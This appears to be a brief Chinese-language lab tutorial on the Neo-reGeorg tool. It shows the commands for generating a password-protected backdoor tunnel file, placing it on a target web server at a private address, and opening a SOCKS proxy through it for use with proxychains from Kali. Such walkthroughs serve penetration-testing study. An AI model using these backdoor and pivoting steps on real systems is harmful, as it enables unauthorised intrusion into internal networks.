目录

上传工具到攻击机 

使用说明

生成后门文件 

由于电脑短路无法拖动文件，我就wget发送到目标主机tunnel.php文件​

成功上传​

可以访问上传的文件

启动代理监听

成功带出

---

后台私信获取弹药库工具reGeorg

上传工具到攻击机 

使用说明

生成后门文件 

python3 neoreg.py generate -k crazy #-k crazy 设置密码为crazy

 成功上传

可以访问上传的文件

启动代理监听

python3 neoreg.py -u http://192.168.20.130/public/test/tunnel.php -k crazy 
python3 neoreg.py -u http://192.168.20.130/public/test/tunnel.php -k crazy -l 0.0.0.0 -p 20000  #-l 0.0.0.0设置监听地址 -p 20000设置监听端口    注意：不要忘记proxychains的修改

 可以看到初始是监听127.0.0.1:1080，我们选择改监听地址和端口带出到我们物理机

python3 neoreg.py -u http://192.168.20.130/public/test/tunnel.php -k crazy -l 0.0.0.0 -p 20000

 成功带出

 配置kali代理,kali也可以正常请求到